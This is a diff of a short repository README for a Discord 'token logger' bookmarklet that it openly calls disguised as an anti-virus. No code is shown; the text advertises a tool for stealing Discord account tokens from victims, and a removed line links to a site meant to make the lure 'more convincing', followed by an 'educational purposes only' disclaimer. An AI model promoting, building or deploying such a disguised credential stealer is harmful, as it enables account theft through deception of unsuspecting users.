jangodev/Token-Bookmarklet-For-Discord/README.md

 # Bookmarklet Token Logger for Discord
-A token logger for discord, disguised as an anti-virus, by fluke You can use this site to be a little more convincing: https://discord-antivirus.flukehusky.repl.co/
+A token logger for discord, disguised as an anti-virus, by jango

 Note: Please use this at your own risk.
 This is for educational purposes only.
 I am not responsible for damages caused to others.